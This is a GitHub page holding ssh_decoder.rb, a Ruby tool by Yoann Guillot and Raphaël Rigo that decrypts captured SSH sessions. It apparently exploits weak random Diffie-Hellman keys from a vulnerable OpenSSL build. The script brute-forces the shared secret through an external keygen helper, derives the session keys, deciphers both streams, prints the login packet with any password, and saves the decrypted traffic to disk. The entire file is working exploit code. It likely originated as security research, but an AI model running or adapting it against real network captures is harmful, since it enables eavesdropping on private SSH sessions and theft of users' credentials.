-
Notifications
You must be signed in to change notification settings - Fork 7
/
ssh_decoder.rb
483 lines (427 loc) · 13.6 KB
/
ssh_decoder.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
#!/usr/bin/env ruby
# ssh_decoder
#
# Copyright 2008 Yoann Guillot, Raphaël Rigo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# usage : ./decryptssh.rb [-v] clientserver_stream.dat serverclient_stream.dat (order does not matter)
# use tcpick to create streams from a pcap
# most options are forwarded to ./keygen
require 'optparse'
opts = {:pidrange => '0-0x7fff', :cpus => 1, :dumpfiles => true }
$skip_bad_packet = false
OptionParser.new { |o|
o.on('-n cpus', '--n-cpu cpus') { |i| opts[:cpus] = i.to_i }
o.on('-h num', '--child-pid num') { |i| opts[:child_pid] = i.to_i }
o.on('-p pidrange', '--pid-range pidrange') { |i| opts[:pidrange] = i }
o.on('-s', '--server', '--vulnerable-server') { |i| opts[:client] = false }
o.on('-c', '--client', '--vulnerable-client') { |i| opts[:client] = true }
o.on('-S shared_secret_hex', '--secret shared_secret_hex', '--shared-secret shared_secret_hex') { |i| opts[:shared] = i }
o.on('-d', '--stdout') { opts[:dumpfiles] = false }
o.on('--skip') { $skip_bad_packet = true }
o.on('-v') { $VERBOSE = true }
}.parse!(ARGV)
class Stream
attr_accessor :data, :ptr, :banner, :maclen, :deciphlen, :decipher, :packets, :compr
def initialize(str)
@data = str
@ptr = 0
@maclen = 0
@banner = ''
@packets = []
@decipher = nil
@compr = nil
end
def read(len=@data.length-@ptr)
@ptr += len
@data[@ptr-len, len].to_s
end
def readbanner
@banner = read(@data.index("\n", @ptr)-@ptr+1)
puts @banner if $VERBOSE
@banner
end
def readpacket
ciphlen = CipherBlockSize[@decipher.name] rescue nil if @decipher
ciphlen ||= 16
buf = read(ciphlen)
buf = @decipher.update(buf) if @decipher
p buf if $DEBUG
length = buf.unpack('N').first
if length > 0x10_0000
raise 'bad packet' if not $skip_bad_packet
puts "bad packet :("
@decipher.update read(16)
mac = read(@maclen)
@packets << SshPacket.new(buf.length+1, 0.chr+buf, '', mac)
return @packets.last
end
tbuf = read(length + 4 - ciphlen)
tbuf = @decipher.update(tbuf) if @decipher and not tbuf.empty?
buf = buf[4..-1] << tbuf
mac = read(@maclen)
pad = buf[0, 1].unpack('C*')[0]
payload = buf[1...-pad]
pad = buf[-pad, pad]
case @compr
when 'none'
when 'zlib'; payload = @zlib.inflate(payload)
end
@packets << SshPacket.new(length, payload, pad, mac)
@packets.last
end
def readstream
begin
# XXX if it doesnt work (invalid header blabla), try with ZLib::Inflate.new(-15) instead
@zlib = ZLib::Inflate.new(nil) if @compr == 'zlib'
nil while pkt = readpacket and @ptr < @data.length and not ['DISCONNECT', 'NEWKEYS'].include?(pkt.type)
puts if $VERBOSE
rescue
puts $!, $!.message, $!.backtrace
end
end
def [](type)
return @packets.find { |pkt| pkt.type == type }
end
def to_s
@packets.join(', ')
end
end
class SshPacket
SSH_MSG = {
1 => 'DISCONNECT',
2 => 'IGNORE',
3 => 'UNIMPLEMENTED',
4 => 'DEBUG',
5 => 'SERVICE_REQUEST',
6 => 'SERVICE_ACCEPT',
20 => 'KEXINIT',
21 => 'NEWKEYS',
30 => 'DH_GEX_REQUEST_OLD',
31 => 'DH_GEX_GROUP',
32 => 'DH_GEX_INIT',
33 => 'DH_GEX_REPLY',
34 => 'DH_GEX_REQUEST',
50 => 'USERAUTH_REQUEST',
51 => 'USERAUTH_FAILURE',
52 => 'USERAUTH_SUCCESS',
53 => 'USERAUTH_BANNER',
90 => 'CHANNEL_OPEN',
91 => 'CHANNEL_OPEN_CONFIRMATION',
92 => 'CHANNEL_OPEN_FAILURE',
94 => 'CHANNEL_DATA',
97 => 'CHANNEL_CLOSE',
}
attr_accessor :length, :payload, :pad, :mac, :interpreted, :type
def initialize(length, payload, pad, mac)
@length, @payload, @pad, @mac = length, payload, pad, mac
interpret
end
def bin
[@length].pack('N') << @pad.length << @payload << @pad
end
def to_s
@payload
end
def interpret
ptr = 0
read = proc { |n| ptr += n ; @payload[ptr-n, n].to_s }
readbyte = proc { read[1].unpack('C').first }
readint = proc { read[4].unpack('N').first }
readstr = proc { read[readint[]] }
readstrlist = proc { readstr[].split(',') }
@type = readbyte[]
@type = SSH_MSG.fetch(@type, @type)
case @type
when 'KEXINIT'
@interpreted = { :cookie => read[16],
:kex_algorithms => readstrlist[],
:server_host_key_algorithms => readstrlist[],
:ciph_c2s => readstrlist[],
:ciph_s2c => readstrlist[],
:mac_c2s => readstrlist[],
:mac_s2c => readstrlist[],
:compr_c2s => readstrlist[],
:compr_s2c => readstrlist[],
:lang_c2s => readstrlist[],
:lang_s2c => readstrlist[],
:first_kex_follows => readbyte[],
:reserved => read[4]
}
when 'DH_GEX_INIT'
@interpreted = { :e => readstr[] }
when 'DH_GEX_GROUP'
@interpreted = { :p => readstr[], :g => readstr[] }
when 'DH_GEX_REPLY'
@interpreted = { :key => readkeyblob(readstr[]), :f => readstr[], :sign => readstr[] }
when 'SERVICE_REQUEST', 'SERVICE_ACCEPT'
@interpreted = { :service => readstr[] }
when 'DISCONNECT'
@interpreted = { :reason => readint[], :msg => readstr[], :lang => readstr[] }
when 'USERAUTH_REQUEST'
@interpreted = { :username => readstr[], :nextservice => readstr[], :auth_method => readstr[] }
case @interpreted[:auth_method]
when 'none'
when 'password'
@interpreted[:change] = readbyte[]
@interpreted[:password] = readstr[]
when 'publickey'
@interpreted[:testic] = readbyte[]
@interpreted[:keytype] = readstr[]
@interpreted[:key] = readkeyblob(readstr[])
else
@interpreted[:data] = read[@payload.length]
end
when 'USERAUTH_FAILURE'
@interpreted = { :meth_allowed => readstr[] }
when 'USERAUTH_SUCCESS'
@interpreted = {}
when 'CHANNEL_DATA'
@interpreted = { :chan => readint[], :data => readstr[] }
puts "#@type #{@interpreted[:chan]} #{@interpreted[:data].inspect}" if $VERBOSE
return
when 'CHANNEL_CLOSE'
@interpreted = { :chan => readint[] }
else
@interpreted = { :data => read[@payload.length-1] }
end
puts "#@type #{@interpreted.inspect}" if $VERBOSE
end
def [](x)
@interpreted[x]
end
end
def readkeyblob(str)
ptr = 0
read = proc { |n| ptr += n ; str[ptr-n, n] }
readstr = proc { read[read[4].unpack('N').first] }
ret = {}
ret[:type] = readstr[]
case ret[:type]
when 'ssh-rsa'; [:e, :n]
when 'ssh-dss'; [:p, :q, :g, :y] # TODO check order
else ret[:unknown] = read[str.length] ; []
end.map { |k| ret[k] = readstr[] }
ret
end
def makekeyblob(key)
key[:type].sbin +
case key[:type]
when 'ssh-rsa'; [:e, :n]
when 'ssh-dss'; [:p, :q, :g, :y]
end.map { |e| key[e].sbin }.join
end
def find_matching_alg(client, server)
client.find { |c| server.include? c }
end
class String
def sbin
[length].pack('N') << self
end
def allhex
self.unpack('H*')
end
end
require 'openssl'
CipherKeySize = {
"none" => 8,
"des" => 8, "3des" => 16, "3des-cbc" => 24,
"blowfish" => 32, "blowfish-cbc" => 16,
"cast128-cbc" => 16,
"arcfour" => 16, "arcfour128" => 16, "arcfour256" => 32,
"aes128-cbc" => 16, "aes192-cbc" => 24, "aes256-cbc" => 32,
"rijndael-cbc@lysator.liu.se" => 32,
"aes128-ctr" => 16, "aes192-ctr" => 24, "aes256-ctr" => 32,
}
CipherBlockSize = {
"none" => 8,
"des" => 8, "3des" => 8, "3des-cbc" => 8,
"blowfish" => 8, "blowfish-cbc" => 8,
"cast128-cbc" => 8,
"arcfour" => 8, "arcfour128" => 8, "arcfour256" => 8,
"aes128-cbc" => 16, "aes192-cbc" => 16, "aes256-cbc" => 16,
"rijndael-cbc@lysator.liu.se" => 16,
"aes128-ctr" => 16, "aes192-ctr" => 16, "aes256-ctr" => 16,
}
class AESCtr
attr_accessor :aes
def initialize(bitsize=128)
@aes = OpenSSL::Cipher::Cipher.new("aes-#{bitsize}-ecb")
@aes.encrypt
@tmpbuf = ''
end
def update(data)
@tmpbuf << data
ret = ''
while @tmpbuf.length >= 16
buf = @tmpbuf[0, 16]
@tmpbuf = @tmpbuf[16..-1]
ciph = @aes.update(@iv)
increment_counter
ret << buf.unpack('C*').zip(ciph.unpack('C*')).map { |a, b| a^b }.pack('C*')
end
ret
end
def increment_counter
16.times { |i|
i = 15-i
if @iv[i] == 255
@iv[i] = 0
else
@iv[i] += 1
break
end
}
end
def iv=(iv) @iv = iv[0, 16] end
def iv ; @iv end
def decrypt ; end
def encrypt ; end
def method_missing(*a)
@aes.send(*a)
end
end
# open the streams
stream1 = Stream.new File.open(ARGV.shift, 'rb') { |fd| fd.read }
stream2 = Stream.new File.open(ARGV.shift, 'rb') { |fd| fd.read }
# read the streams
puts " * read handshake"
abort '1st file has no SSH banner' if stream1.readbanner[0, 4] != 'SSH-'
stream1.readstream
abort '2nd file has no SSH banner' if stream2.readbanner[0, 4] != 'SSH-'
stream2.readstream
# TODO : detect vulnerable OpenSSH versions based on banners
# identify client/server
# TODO : handle shitty clients/servers like dropbear which do not use GEX
# but instead use predefined groups
cs = [stream1, stream2].find { |stream| stream['DH_GEX_INIT' ] }
ss = [stream1, stream2].find { |stream| stream['DH_GEX_REPLY'] }
# determine algorithms
kex_c = cs['KEXINIT']
kex_s = ss['KEXINIT']
cipher = find_matching_alg(cs['KEXINIT'][ :ciph_c2s], ss['KEXINIT'][ :ciph_s2c])
mac = find_matching_alg(cs['KEXINIT'][ :mac_c2s], ss['KEXINIT'][ :mac_s2c])
compr = find_matching_alg(cs['KEXINIT'][:compr_c2s], ss['KEXINIT'][:compr_s2c])
# for kex_hash get the last part of the algorithm names
kex_hash = find_matching_alg(cs['KEXINIT'][:kex_algorithms], ss['KEXINIT'][:kex_algorithms]).split('-').last
puts "cipher: #{cipher}, mac: #{mac}, kex_hash: #{kex_hash}, compr: #{compr}"
groupinfo = ss['DH_GEX_GROUP']
gex_reply = ss['DH_GEX_REPLY']
gex_init = cs['DH_GEX_INIT']
needed_bits = CipherKeySize[cipher] * 8 * 2
if opts[:client]
weak_key = gex_init[:e].allhex
other_key = gex_reply[:f].allhex
else
other_key = gex_init[:e].allhex
weak_key = gex_reply[:f].allhex
end
if opts[:shared]
shared_secret = opts[:shared]
else
puts " * bruteforce DH"
args = { 'b' => needed_bits, 'p' => opts[:pidrange], (opts[:client] ? 'c' : 's') => '',
'G' => groupinfo[:g].allhex, 'P' => groupinfo[:p].allhex,
'k' => weak_key, 'K' => other_key, 'n' => opts[:cpus]}
if not opts[:client]
args.update 'r' => gex_reply[:key][:n].allhex if gex_reply[:key][:n]
args.update 'h' => opts[:child_pid] if opts[:child_pid]
end
commandline = "./keygen " + args.sort.map { |k, v| "-#{k} #{v}" }.join(' ')
puts commandline if $VERBOSE
ENV['ENVIRON'] = "ubuntu-7.04-x86-patched" if not ENV['ENVIRON']
bruteforce_out = `LD_LIBRARY_PATH=$PWD/$ENVIRON/ LD_PRELOAD=$PWD/$ENVIRON/fakepid.so $PWD/$ENVIRON/ld-linux.so.2 #{commandline}`
puts bruteforce_out if $VERBOSE
abort "Bruteforce failed" if not $?.exited? or $?.exitstatus != 0
shared_secret = bruteforce_out.split("\n")[-2]
end
shared_secret = '0' + shared_secret if shared_secret.length & 1 == 1
shared_secret = '00' + shared_secret if shared_secret[0, 1].to_i(16) >= 8
puts "DH shared secret : " + shared_secret
puts " * derive keys"
dh_size_request = (cs['DH_GEX_REQUEST'] || cs['DH_GEX_REQUEST_OLD']).payload[1..-1]
blob = [cs.banner.chomp, ss.banner.chomp, cs['KEXINIT'].payload, ss['KEXINIT'].payload,
makekeyblob(gex_reply[:key])].map { |e| e.sbin }.join + dh_size_request +
[groupinfo[:p], groupinfo[:g], gex_init[:e], gex_reply[:f], [shared_secret].pack('H*')].map { |e| e.sbin }.join
puts blob.allhex.first.scan(/.{0,32}/) if $DEBUG
handshake_hash = OpenSSL::Digest::Digest.digest(kex_hash, blob).allhex.first
puts "handshake hash : " + handshake_hash if $VERBOSE
we_need = CipherKeySize[cipher]
session_id = handshake_hash
derived = %w[A B C D E F].map { |let|
k_h = [shared_secret.length/2, shared_secret].pack('NH*') + [handshake_hash].pack('H*')
key = OpenSSL::Digest::Digest.digest(kex_hash, k_h + let + [session_id].pack('H*'))
# Derive a longer key if needed
while key.length < we_need
key << OpenSSL::Digest::Digest.digest(kex_hash, k_h+key)
end
key[0, we_need]
}
puts 'derived keys : ', derived.map { |k| k.allhex } if $VERBOSE
puts ' * decipher streams'
cipher = OpenSSL::Cipher.ciphers.find { |cp| cp.gsub('-', '').downcase == cipher.gsub('-', '').downcase } || cipher # 'aes128-cbc' => 'aes-128-cbc'
puts "Cipher : #{cipher}" if $VERBOSE
case cipher
when /aes(\d+)-ctr/i
bitsize = $1.to_i
c2s = AESCtr.new bitsize
s2c = AESCtr.new bitsize
else
c2s = OpenSSL::Cipher::Cipher.new(cipher)
s2c = OpenSSL::Cipher::Cipher.new(cipher)
c2s.decrypt
s2c.decrypt
end
c2s.padding = 0
c2s.iv = derived[0]
c2s.key = derived[2]
cs.decipher = c2s
cs.compr = compr
s2c.padding = 0
s2c.iv = derived[1]
s2c.key = derived[3]
ss.decipher = s2c
ss.compr = compr
case mac
when 'hmac-md5'
cs.maclen = ss.maclen = 16
when 'hmac-sha1'
cs.maclen = ss.maclen = 20
else
raise 'unsupported HMAC'
end
puts "", " * Client to server stream" if $VERBOSE
cs.readstream
puts "", " * Server to client stream" if $VERBOSE
ss.readstream
puts " * End of streams", "" if $VERBOSE
# dump credentials
if ss['USERAUTH_SUCCESS']
puts ' * successful authentication packet'
auth = cs.packets.find_all { |p| p.type == 'USERAUTH_REQUEST' }.last
begin
require 'pp'
pp auth.interpreted
rescue LoadError
p auth.interpreted
end
end
if opts[:dumpfiles]
# dump streams
i = 0
i += 1 while File.exist?(cfile = "sshdecrypt.#{i}.client.dat") or File.exist?(sfile = "sshdecrypt.#{i}.server.dat")
File.open(cfile, 'wb') { |fd| cs.packets.each { |p| fd.write p.payload } }
File.open(sfile, 'wb') { |fd| ss.packets.each { |p| fd.write p.payload } }
puts " * deciphered streams saved to #{cfile.inspect} & #{sfile.inspect}"
end